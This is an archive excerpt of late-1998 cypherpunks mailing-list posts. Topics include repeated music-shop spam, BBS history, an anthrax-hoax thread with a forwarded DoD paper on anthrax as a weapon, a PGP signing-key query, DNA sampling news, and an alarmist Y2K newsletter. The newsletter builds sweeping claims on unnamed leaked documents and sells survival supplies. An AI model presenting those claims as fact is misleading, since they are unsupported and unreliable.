Message-ID: <026ed13180019c8COSWEB2@twistedtunes.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi Twisted Tunes fans!

Just a short note to let you know there are brand new Twisted Tunes in the
Jukebox at http://www.twistedtunes.com  We are stepping up our production
schedule for '99, so we'll let you know as new songs are added.

If you want to give someone that TWISTED CHRISTMAS gift, our online store
is
stocked with all titles and we ship daily. Go to
http://www.twistedtunes.com/order to pick up a cool stocking stuffer.

As always, thanks for your support...

Bob Rivers

PS. This is really me. I wrote this e-mail. Not a form letter. Honest.
What
do I got to do to prove it to you?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rivers@twistedtunes.com (Bob Rivers)
Date: Fri, 25 Dec 1998 19:50:09 +0800
To: <cypherpunks@cyberpass.net>
Subject: It's Christmast Time
Message-ID: <08d5531011119c8COSWEB2@twistedtunes.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi Twisted Tunes fans!

Just a short note to let you know there are brand new Twisted Tunes in the
Jukebox at http://www.twistedtunes.com  We are stepping up our production
schedule for '99, so we'll let you know as new songs are added.

If you want to give someone that TWISTED CHRISTMAS gift, our online store
is
stocked with all titles and we ship daily. Go to
http://www.twistedtunes.com/order to pick up a cool stocking stuffer.

As always, thanks for your support...

Bob Rivers

PS. This is really me. I wrote this e-mail. Not a form letter. Honest.
What
do I got to do to prove it to you?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rivers@twistedtunes.com (Bob Rivers)
Date: Fri, 25 Dec 1998 19:55:24 +0800
To: <cypherpunks@cyberpass.net>
Subject: It's Christmast Time
Message-ID: <08ced33011119c8COSWEB2@twistedtunes.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi Twisted Tunes fans!

Just a short note to let you know there are brand new Twisted Tunes in the
Jukebox at http://www.twistedtunes.com  We are stepping up our production
schedule for '99, so we'll let you know as new songs are added.

If you want to give someone that TWISTED CHRISTMAS gift, our online store
is
stocked with all titles and we ship daily. Go to
http://www.twistedtunes.com/order to pick up a cool stocking stuffer.

As always, thanks for your support...

Bob Rivers

PS. This is really me. I wrote this e-mail. Not a form letter. Honest.
What
do I got to do to prove it to you?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypherpu <cyphrpnk@rainbow.thinkthink.com>
Date: Mon, 21 Dec 1998 01:15:49 +0800
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: CyberScam
In-Reply-To: <3.0.5.32.19981219212836.008297e0@idiom.com>
Message-ID: <199812201649.IAA21181@rainbow.thinkthink.com>
MIME-Version: 1.0
Content-Type: text/plain




Actually ward doesnt claim to have invented the first BBS
he used to claim he had invented the first microcomputer based BBS(
And that he did I used to run his software in chicago about a week after its 
initial releas on a pmmi-103?? modem(300 baud)....I wondered what ever
happened to ward... Modem7 was a GOOD protocol at the time ...
aonly to be supplanted by first ymodem then zmodem from chuck forsberg...
P.s. I used to play on the plato system also(its official charter at the
time was limited to educators and Comp-sci typs (of which I was the later)
Plato was GREAT for multiplayer games like "intergalactic conflict",(memory is
poor here)... BTW why Plato had  a messaging system of sorts it is
GREATLY stretching it to call it a BBS...


      cheers
      n OLD fart




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 21 Dec 1998 01:37:54 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: Anthrax Theatre
In-Reply-To: <199812200637.HAA04958@replay.com>
Message-ID: <v03130326b2a2e07ca975@[209.66.101.206]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:37 PM -0800 12/19/98, Anonymous wrote:
>>At 9:17 PM -0800 12/19/98, Anonymous wrote:
>>
>>>The FBI is in between a rock and a hard-on here.
>>>
>>>If anthrax spores really had been released into those air ducts, it could
>>>potentially infect anyone in the building. They can't very well let these
>>>people walk out when they might be carriers of antrax. That's the power of
>>>bioweapons: Infect a bunch of people and they do the work of spreading it
>>>for you.
>>
>>This is not how anthrax spreads. Communicability between humans is nearly
>>nonexistent.
>
>If this is true, we've caught the media in yet another lie. The media likes
>to paint the picture that anthrax can be released in an airport and spread
>to all corners of the country in a matter of hours.
>
>Typical of the media. Shame on me for accessing anything they've shoved down
>my throat. :)

Even if I hadn't read "The Hot Zone," "The Coming Plague," "The Cobra
Event," and various other CBW books and articles, and even if I hadn't
visited the CDC and other Web sites, I would have known from news reports
that the trick to using anthrax as a weapon is to properly disperse the
spores.

Human to human contact is a poor way to disperse these spores. Eating the
flesh of anthrax-infected humans _may_ spread the spores, but data are too
sparse to verify this.

--Tim May

We would go to their homes, and we'd kill their wives and
their children. We would kill their families
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Mon, 21 Dec 1998 03:54:00 +0800
To: Bill Stewart <cypherpunks@cyberpass.net
Subject: Re: CyberScam
In-Reply-To: <v03130319b29dca4317ce@[209.66.101.206]>
Message-ID: <v03110738b2a2d449d711@[209.109.239.194]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:28 PM -0700 12/19/98, Bill Stewart wrote:
>At 12:43 PM 12/16/98 -0800, Tim May wrote
>>Nonsense. Many of us use our "real names" on the Internet, right here on
>>this non-business list. In fact, real names outnumber nyms by probably
>>10-1. Ditto for most of the Usenet and most mailing lists. Chat rooms may
>>be a different story...I wouldn't know about them.
>
>Similarly, IRC and CuSeeMe appear to be nym-oriented rather than
>real-sounding-name-oriented.  AOL isn't exactly the internet,
>but it tends to use screen names.  I'm not sure about ICQ, but
>I think it's also nym-oriented, and it's got 10 million or so users.

The Palace (http://www.thepalace.com) is mostly nym oriented.


-------------------------------------------------------------------------
Bill Frantz       | Macintosh: Didn't do every-| Periwinkle -- Consulting
(408)356-8506     | thing right, but did know  | 16345 Englewood Ave.
frantz@netcom.com | the century would end.     | Los Gatos, CA 95032, USA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Mon, 21 Dec 1998 00:42:33 +0800
To: Anonymous <cypherpunks@EINSTEIN.ssz.com
Subject: Re: Anthrax Theatre
In-Reply-To: <199812200637.HAA04958@replay.com>
Message-ID: <4.0.2.19981220110855.00c4a280@mail.well.com>
MIME-Version: 1.0
Content-Type: text/plain




At 07:37 AM 12-20-98 +0100, Anonymous wrote:
>If this is true, we've caught the media in yet another lie. The media likes
>to paint the picture that anthrax can be released in an airport and spread
>to all corners of the country in a matter of hours.

Damn! You've found us out.

Time to alert The Cabal.

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Mon, 21 Dec 1998 01:30:28 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Anthrax Theatre
In-Reply-To: <v03130324b2a23f932946@[209.66.101.206]>
Message-ID: <199812201710.LAA16562@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes:
 
> This is not how anthrax spreads. Communicability between humans is
> nearly nonexistent.
 
Indeed, which was my point.
 
This type of operant conditioning of the sheeple is becoming almost
routine.
 
Witness the "Arab Oil Embargo", where there were long gas lines and
blaming of the Arab world, without one drop of oil ceasing to flow
into the United States.
 
"Drug Lab" busts, with prolonged evacuation of several square blocks
of neighborhood by men in astronaut garb are very routine now, every
time the police find a can of ether or other organic solvent in some
person's apartment.
 
Children are marched outside a school, stripped, and hosed down by
biohazard teams, because someone broke a mercury thermometer in class.
 
Now we have the latest incarnation of adjusting sheeple motivational
inperatives, Anthrax Theatre.  Genuine Anthrax not required, of
course. Yes children, see what happens because of Saddam Hussein?
There'll be a test later, to see if further attitudinal adjustment is
required.

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 21 Dec 1998 02:48:35 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Anthrax [DoD]
Message-ID: <199812201824.MAA00621@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.defenselink.mil/other_info/agent.html

>     Go to Home Page - U.S. Department of Defense U.S. DEPARTMENT OF
>    DEFENSE
>    Home Site Map Search   major sections are next NEWS  MULTIMEDIA
>    PUBLICATIONS  QUESTIONS?
>    
>   Information Paper
>   Anthrax as a Biological Warfare Agent
>      * Anthrax is the preferred biological warfare agent because:
>        
>      * It is highly lethal.
>        
>      * 100 million lethal doses per gram of anthrax material (100,000
>        times deadlier than the deadliest chemical warfare agent).
>      * Silent, invisible killer.
>      * Inhalational anthrax is virtually always fatal.
>        
>      * There are low barriers to production.
>        
>      * Low cost of producing the anthrax material.
>      * Not high-technology. Knowledge is widely available.
>      * Easy to produce in large quantities.
>        
>      * It is easy to weaponize.
>        
>      * It is extremely stable. It can be stored almost indefinitely as a
>        dry powder.
>      * It can be loaded, in a freeze-dried condition, in munitions or
>        disseminated as an aerosol with crude sprayers.
>        
>      * Currently, we have a limited detection capability.
>      * What is Anthrax?
>        
>      * Anthrax is a naturally occurring disease of plant eating animals
>        (goats, sheep, cattle, wine, etc.) caused by the bacterium
>        Bacillus anthracis.
>      * It is an illness which has been recognized since antiquity.
>        Anthrax was common in essentially all areas where livestock are
>        raised. Intensive livestock immunization programs have greatly
>        reduced the occurrence of the disease among both animals and
>        humans in much of the world, an most outbreaks occur in areas
>        where immunization programs have not been implemented or have
>        become compromised (primarily Africa and Asia; however, outbreaks
>        occurred during the mid- I 990's in Haiti and the former Soviet
>        Union).
>      * Anthrax spores can remain viable for several decades under
>        suitable environmental conditions; thus, absence of cases does not
>        equate to absence of risk.
>        
>      * Humans can contract anthrax in three ways:
>        
>      * Through cuts or breaks in the skin resulting from contact with an
>        infected animal (cutaneous anthrax), resulting in local and
>        possibly systemic (bloodstream) infection.
>        
>      * From breathing anthrax spores (termed "woolsorters" disease)
>        resulting in an infection of the lungs (inhalational anthrax).
>        
>      * From eating infected meat, resulting in gastrointestinal infection
>        (gastrointestinal anthrax). Gastrointestinal anthrax is generally
>        not considered a threat to U.S. forces.
>      * What are the symptoms?
>        
>      * Symptoms of anthrax begin after a 1 to 6 day incubation period
>        following exposure.
>        
>      * For contact or cutaneous anthrax, itching will occur at the site
>        of exposure followed by the formation of a lesion. Untreated
>        contact anthrax has a fatality rate of 5-20 percent, but with
>        effective antibiotic treatment, few deaths occur.
>      * Initial symptoms for inhalational anthrax are generally
>        non-specific: low grade fever, a dry hacking cough, and weakness.
>        The person may briefly improve after 2 to 4 days; however within
>        24 hours after this brief improvement, respiratory distress occurs
>        with shock and death following shortly thereafter.
>        
>      * Almost all cases of inhalational anthrax, in which treatment was
>        begun after patients have exhibited symptoms, have resulted in
>        death, regardless of post-exposure treatment.
>      * What is the medical countermeasure?
>        
>      * Prior to exposure, prevention through vaccination, using the
>        FDA-licensed vaccine.
>      * Otherwise, antibiotics such as penicillin, ciprofloxacin, and
>        doxycycline are the drugs of choice for treatment of anthrax.
>      * Treatment with antibiotics must begin prior to the onset of
>        symptoms and must include vaccination prior to discontinuing their
>        use.
>      * The use of antibiotics keep the patient alive until their body can
>        build an immunity to anthrax via vaccination. After symptoms
>        appear however, inhalational anthrax is almost always fatal,
>        regardless of treatment.
>        
>    
>      _________________________________________________________________
>    
>    
>    
>    Updated: 10 Jun 1998
>    Contact Us
>    Security and Privacy Notice
> 


    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@ciphr.org>
Date: Wed, 23 Dec 1998 01:52:17 +0800
To: ukcrypto@maillist.ox.ac.uk
Subject: mysterious PGP release-signing keys
Message-ID: <v04103b00b2a2b76183d0@[192.168.248.7]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Please excuse the crosspost, but does anyone know *who* generated and/or
owns these keys?

 0xBB1EEF1B Verify
 0xC8501551 Verify Key for http://www.arc.unm.edu/~drosoff/*
 0xAA9AE13F Verify PGP 6.0.2 PP - RSA
 0x772B7382 VERIFY <VERIFY@gnwmail.com>

They seem to be used for signing/verifying PGP releases (e.g. the 602 by CKT
at Replay), but there's nothing on the keys that identifies the responsible
engineer who compiled the source, nor do some of them seem to be certified
by anyone in the WoT. Questions have been raised about the authenticity and
security of those compiles and these keys.

   dave


-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0.2
Comment: Get interested in computers -- they're interested in YOU!

iQA/AwUBNn11mJBN/qMowCmvEQI4IwCfad0S9Algw7PPDsgWChimC4Cx6dcAnjtu
h2trwMi08tJMCD76W6W8DP/L
=TFuT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 21 Dec 1998 06:56:57 +0800
To: cypherpunks@cyberpass.net
Subject: major phone company & y2k
Message-ID: <199812202219.OAA27152@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



internet company documents suggest severe problems


------- Forwarded Message
Subject:     Y2K Alert - 12/17/98 - Internal documents reveal telecomm 
truth
Sent:        12/16/98 11:50 PM
Received:    12/17/98 10:37 PM
From:        alertsend@y2knewswire.com
To:          Eddie Pons, ponski@soft-link.com

The following is a free Y2K alert + analysis from Y2KNEWSWIRE.
COM. You signed up for this. Removal / unsubscribe instructions
and e-mail contacts are at the bottom of this e-mail. *Do not*
reply by hitting 'reply' in your e-mail program. To reach us, you
must use one of the e-mail addresses given below. 
____________________________________________________________


SECRET DOCUMENTS REVEAL Y2K TELECOMM TRUTH: A MAJOR
LONG-DISTANCE COMPANY KNOWS THEY WON'T MAKE IT
(But they won't admit it publicly...)

Y2KNEWSWIRE recently received a collection of internal documents
from an employee at one of the major long-distance companies. The
documents appear to be genuine. However, to avoid copyright
infringement, we cannot reprint them here.

But we *can* paraphrase the documents without violating
copyright law, and that's what we're going to do in this alert.
We feel it is our responsibility to inform the public the truth
about Y2K problems at large telecommunications companies.

We are withholding the name of the company because frankly, the
name does not matter. We think *all* the major telecommunications
firms are in the same position. The problems described by this
one are not unique. Every firm is playing the same spin game,
avoiding a public admission of Y2K-guilt while privately,
internally, they all know the situation is hopeless.

Here's what we found in one particular document:

[COMPANY] SUMMARIZES THE PROBLEM
In the first part of the document, the company simply summarizes
the Y2K problem.

[COMPANY] ADMITS ENTIRE SYSTEMS COULD BE SHUT DOWN
Mid-way through the documents, the company acknowledges that
corrupt data could cause the shutdown of entire systems. They
quote a study of network switch components conducted by Bellcore,
describing how they were completely locked up after a simulated
2000 rollover.

The company then refers to this as the, "Killer aspect" of the
system. Then, the documents describe the company's ongoing
efforts to solve the problem, pointing out that the deadline,
"absolutely cannot slip."

[COMPANY] ESTIMATES ITS EXPOSURE
The company then says it has between 80 and 100 million lines of
code that might be affected by the Millennium Bug. It goes on to
call the bug a "virus," which is technically incorrect, but close
enough for telecommunications work, apparently.

Then the company describes another test of a Bellcore switch
that experienced a frightening shutdown due to an expiring
license date problem. The switch shut down completely. Another
component apparently worked until April of 2000 (in simulation),
then it, too, shut down as the daylight savings time change was
attempted.

[COMPANY] ADMITS THEY CAN'T MAKE IT!
Then, the company's internal document claims that fixing the
problem is, "too large a task" to finish in time. There simply
aren't enough staff hours, according to these documents.

The company then goes on to describe a strategy of triage:
they'll accept failures in *some* systems in order to focus on
the BIG ones. And that's the big challenge, they say: identifying
the big systems and getting them remediated in time.

THAT'S IT!
The document then ends with a warning that all documentation is
for internal use only and cannot be distributed outside the
company.


WHAT DOES IT MEAN?
Publicly, this company is telling people they will complete all
Y2K remediation on time. We now have proof this is a *con job*
designed to deceive customers and investors. And we suspect this
is the situation with *most* companies. Internally, when the
engineers sit around the lunch table, they all know the situation
is basically hopeless. There simply isn't enough time remaining.
But publicly, these companies vigorously defend their positions,
claiming *everything* will be finished before 2000 and using
classic denial phrases like, "We're well on our way..." and, "...
the vast majority of our critical systems will be done."

This is exactly why 2000 is going to be the biggest shocker
we've seen in a generation. It's the moment at which all Y2K lies
and deceptions are revealed. The spin melts away to reality.

IT'S BEEN A WHILE
Americans haven't seen this for a long, long time. Deceptions
are the norm these days, and "truth" and "reality" seem to be
relative -- especially in politics. The people in power have
actually come to believe that words equal reality. If they say it,
it must be true.

Y2K is the one event that cannot be persuaded. It does not
listen to spin and hype. It doesn't have a "mind" to be subjected
to mind games. It will simply happen -- precisely on schedule.

Remember, bureaucrats are not used to operating under these
circumstances. Take the stock market, for instance. Because the
stock market is essentially a vehicle of faith, when Clinton says
the stock market is good, it *is* good because people believe him.
The words have a direct causal effect. Y2KNEWSWIRE thinks
politicians have forgotten that Y2K doesn't work that way. If all
spinsters on the planet gathered together and gave us their best
hype, it would still have zero effect on fixing the Millennium
Bug.

This is the point they don't understand. Do you wonder why John
Koskinen continues telling people the federal government will
have absolutely no Year 2000 problems? He's in spin mode, not
reality mode. And he seems to believe his spin will somehow solve
the problem.

That's why 2000 will be a reality-check for at least half the
population. Here's a completely objective issue that cannot be
swayed by politics or persuasion. It's a pre-programmed event
designed into the system. It can't be bargained with or reasoned
with. And it most certainly won't listen to spin.
 

SOCIAL SECURITY LIKELY TO MAKE IT
This is virtually the *only* Y2K-compliance claim we believe.
Social Security is going to make the deadline, no kidding.

Why is that?

They've spent *a decade* (employing over 700 programmers) to fix
the bug. And they'll be done in June of 1999. Aside from the
programmers, over 2800 people worked on the problem.

This is exactly why the claims from other agencies that started
much later -- like the FAA -- are simply lacking all credibility.
Do the math here: 700 programmers x 10 years = 1,750,000
person-days of work. That's fourteen million hours of work, and
that doesn't even count the 2800 *non-programmers.*

So Social Security has spent 14 million hours correcting this
problem, according to their own statement. How many hours has the
FAA spent?

Frankly, we don't know. But to equal 14 million hours in just
two years (because they really weren't seriously working on it
until early 1998), they would need to employ 3,500 programmers
working full time!

WHY WASN'T SOCIAL SECURITY FINISHED IN 1991?
If these projects could really be completed in two years, why
wasn't Social Security done in 1991? Why did it take TEN years to
complete the job? If John Koskinen is to be believed, *all*
federal projects, no matter how late they started, will be done
in plenty of time. And that means two years is quite enough for
most agencies. Why did Social Security take ten, then?

You already know the answer.

Note, however, that without telecommunications or banking,
Social Security's compliance doesn't matter.

Read the details at:
http://www.amcity.com/atlanta/stories/1998/12/14/focus5.html


SURVEY REVEALS INSIDER PESSIMISM
According to this San Diego Daily Transcript story (link below),
the Aberdeen Group conducted a survey at November's COMDEX
computer show. Here are some of the more interesting survey
results:

* Less than half are confident their organization's "mission
critical" desktop computer applications will work in 2000
* 20% said their organizations haven't even finished the Y2K
assessment stage
* 53% said they were "unsure" whether their compliant systems
could be effectively shielded from corruption by non-compliant
systems

Read more details at:
http://www.sddt.com/files/library/98/12/07/tca.html


U.N. TO DEPLOY Y2K SWAT TEAMS
These are basically "crisis intervention teams" that would visit
countries with the worst problems and try to solve them. Question:
if international transportation is down, how will the SWAT teams
get around? Read the details in this CNN report:
http://cnn.com/TECH/computing/9812/12/y2k.un/


NEW ZEALAND COMPLIANCE PLANS NEAR COLLAPSE
As this "Radio NZ" report reveals, plans to make public sector
groups Y2K compliant are on the point of collapse. Read the
details at:
http://www.year2000.co.nz/y2krnz01.htm


READER MAIL
"I spoke with my bank (US Bank in Portland) and asked them about
buying gold and silver coins. The bank employee looked at me and
asked, "Y2K?" and I responded "Yes". She told me that I was about
the 150th person this month to inquire about the conversion on
assets to gold. She advised me to call the brokerage division of
the bank."
________________

"At Grand Union in Smithtown, New York, I had a clerk recently
ask me if we
were invaded or something because so many people had packed the
store for the can goods sale. At Waldbaums's in Ronkonkoma, when
they put 20lb bags of
rice on sale (about once a month) they FLY out the door. I saw
one lady buying
three."
________________

"Just a few weeks ago, diesel generators were readily available
in the southern AZ area. Now there are none to be found. We are
looking for one (obviously we postponed too long) and my husband
remembered a large lumber/building supply store in a smaller AZ
town that has always had a large supply of all kinds of
generators (they service many contractors). He drove up there
today and found they had ONE generator, a small 500 watt gas-type,
on the shelf."


- - Webmaster


_____________________________________________
Get ready for Y2K, read the Y2K Sourcebook
Get the inside sources for stocking up now
http://www.y2ksupply.com/index.asp?pageid=sourcebook

_____________________________________________
Tell a friend about the free Y2KNEWSWIRE.COM e-mail alert:
http://www.y2knewswire.com/tellafriend.htm

_____________________________________________
This e-mail message is subject to the following disclaimer:
http://www.y2knewswire.com/Index.asp?pageid=disclaimer
All statements made herein, and made since August of 1998,
are Year 2000 Statements and are retroactively protected
as Year 2000 readiness disclosures under the Good Samaritan Act

_____________________________________________
To be removed from this e-mail list, simply go to
the following web address:
http://www.y2knewswire.com/u.asp?E=ponski@soft-link.com
Or: http://www.y2knewswire.com/remove.htm

_____________________________________________
Join the "believers-only" free Y2K e-mail newsletter:
http://www.y2knewswire.com/believers.htm

_____________________________________________
Please ignore this: (for undeliverable pruning only)
http://www.y2ksupply.com/p.asp?E=ponski@soft-link.com

_____________________________________________
HOW TO REACH US:
If you have a hot tip for us (anonymity assured):
tips@y2knewswire.com

If you have a compliment:
compliments@y2knewswire.com

If you want to be added to the subscription list (free!), visit
http://www.y2knewswire.com and enter your e-mail address in the
sign up box located at the upper-left corner of the page.

If you have a complaint:
complaints@y2knewswire.com

For questions about ordering:
service@y2knewswire.com

For any other comments:
comments@y2knewswire.com




- --------------5394A0C9D7D2472270037192
Content-Type: text/x-vcard; charset=us-ascii; name="vcard.vcf"
Content-Transfer-Encoding: 7bit
Content-Description: Card for Lynford Theobald
Content-Disposition: attachment; filename="vcard.vcf"

begin:          vcard
fn:             Lynford Theobald
n:              ;Lynford Theobald
email;internet: telnet12@burgoyne.com
x-mozilla-cpt:  ;0
x-mozilla-html: FALSE
version:        2.1
end:            vcard


- --------------5394A0C9D7D2472270037192--


- -> Send "subscribe   snetnews " to majordomo@world.std.com
- ->  Posted by: Lynford Theobald <telnet12@burgoyne.com>


------- End of Forwarded Message




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 21 Dec 1998 07:09:02 +0800
To: cypherpunks@cyberpass.net
Subject: SNET: NYC's top cop to outline DNA plan:
Message-ID: <199812202230.OAA28220@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "Mark A. Smith" <msmith01@flash.net>
Subject: SNET: NYC's top cop to outline DNA plan:
Date: Fri, 18 Dec 1998 18:25:12 -0500
To: Maureen <myfirst@tricor.net>, SNET <snetnews@world.std.com>, L & J <liberty-and-justice@mailbox.by.net>, David Rydel <eagleflt@bignet.net>


->  SNETNEWS  Mailing List

This From: Electric Times Union (Albany, NY), December 14, 1998
http://www.timesunion.com

NYC's top cop to outline DNA plan:
Proposal aims to use sampling as a strategy against repeat offenders
http://www.timesunion.com/news/story.asp?storyKey=2960&newsdate=12/14/98

By
RICHARD PYLE
Associated Press

NEW YORK -- Police Commissioner Howard Safir is going public with his
proposal for New York City police to take a DNA sampling along with the
fingerprints of everyone arrested -- a proposal already drawing fire
from
civil libertarians.

Safir planned a speech at a Bronx high school today to formally outline
his
plan as a strategy against repeat offenders -- especially burglars, auto
thieves and other specialists in property crimes.

"I'm asking myself how am I going to continue to reduce crime,'' Safir
told
The New York Times in an interview. Crime in New York City has dropped
by 50
percent in the last five years. The murder rate alone has fallen 20
percent
from a year ago and is expected to finish the year at the lowest level
since
the early 1960s.

Under Safir's plan, the police would take a swabbing from inside the
suspect's cheek, a standard method of collecting DNA, and put it into a
database for future reference. DNA is the unique genetic blueprint of
each
person, said by legal and forensic experts to be as reliable as
fingerprints
and far more useful in identifying individuals responsible for certain
types
of crime.

Safir's plan would require action by the state Legislature to expand the
circumstances under which DNA samples could be taken from criminal
suspects.
At present, New York state allows testing of felons convicted of 21
types of
violent crime, including murder, rape and manslaughter.

All other states have some form of database of DNA taken from felons,
and
last October, the FBI set up a long-discussed national DNA database
beginning with 250,000 names, linked to state-maintained databases. Only
Louisiana tests every person arrested for DNA, as Safir suggests for New
York City.

The genetic profile technology became widely known during the O.J.
Simpson
trial and has been used increasingly in law enforcement, both to
identify
criminals and to exonerate individuals falsely accused or convicted.

Norman Siegel, director of the New York Civil Liberties Union, has
objected
to the proposal, contending that arrest is not sufficient grounds for
authorities to collect personal genetic information, and would violate
the
Forth Amendment safeguard against unreasonable search and seizure.

Involuntary testing for DNA has been challenged legally by several
members
of the armed forces and a group of women on California's death row.

Copyright 1998, Capital Newspapers Division of The Hearst Corporation,
Albany, N.Y.

--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and
international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material
is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(1 - 6 clips most days) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other.

But, none of this can be accomplished without your kind and
generous financial support. If you are concerned about the erosion
of your privacy in general, won't you please help us continue this
important work by becoming an "ISPI Supporter" or by taking out
an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the
following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.



-> Send "subscribe   snetnews " to majordomo@world.std.com
->  Posted by: "Mark A. Smith" <msmith01@flash.net>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 21 Dec 1998 07:08:05 +0800
To: cypherpunks@cyberpass.net
Subject: SNET: [Fwd: [FP] "Anti-government groups" fighting "anti-money laundering" regulation]
Message-ID: <199812202230.OAA28231@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Lynford Theobald <telnet12@burgoyne.com>
Subject: SNET: [Fwd: [FP] "Anti-government groups" fighting "anti-money laundering" regulation]
Date: Sat, 19 Dec 1998 08:10:04 -0700
To: "snetnews@world.std.com" <snetnews@world.std.com>


->  SNETNEWS  Mailing List

This is a multi-part message in MIME format.
--------------F27EB234AAECCD21A8C78784
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Keep up the good work.  Again we can make it happen if we fight together.

LT

--------------F27EB234AAECCD21A8C78784
Content-Type: message/rfc822
Content-Disposition: inline

Received: by bci for telnet12
 (with Cubic Circle's cucipop (v1.21 1997/08/10) Fri Dec 11 20:24:26 1998)
X-From_: owner-scan@efga.org  Thu Dec 10 21:46:07 1998
Return-Path: <owner-scan@efga.org>
Received: from inferno.serversystems.net (inferno.serversystems.net [207.15.209.253])
	by burgoyne.com (8.8.7/8.8.6) with ESMTP id VAA23503
	for <telnet12@burgoyne.com>; Thu, 10 Dec 1998 21:46:07 -0700
Received: (from majordomo@localhost)
	by inferno.serversystems.net (8.8.7/8.8.7) id WAA07977
	for scan-list.efga; Thu, 10 Dec 1998 22:34:25 -0500
Received: from alpha.airnet.net (page.airnet.net [207.120.51.2])
	by inferno.serversystems.net (8.8.7/8.8.7) with ESMTP id WAA07974;
	Thu, 10 Dec 1998 22:34:23 -0500
Received: from scottmcd (207.242.81.215) by alpha.airnet.net (Worldmail 1.3.167); 10 Dec 1998 21:31:48 -0600
From: "ScanThisNews" <mcdonalds@airnet.net>
To: "ScanThisNews Recipients List" <scan@efga.org>
Subject: [FP] "Anti-government groups" fighting "anti-money laundering" regulation
Date: Thu, 10 Dec 1998 21:33:32 -0600
Message-ID: <000f01be24b7$08034640$d751f2cf@scottmcd>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4
Importance: Normal
Sender: owner-scan@efga.org
Precedence: bulk
Reply-To: owner-scan@efga.org
X-Web-Site: http://www.efga.org/
X-Mail-List-Info: http://efga.org/about/maillist/
X-SCAN: http://www.networkusa.org/fingerprint.shtml
Content-Transfer-Encoding: quoted-printable
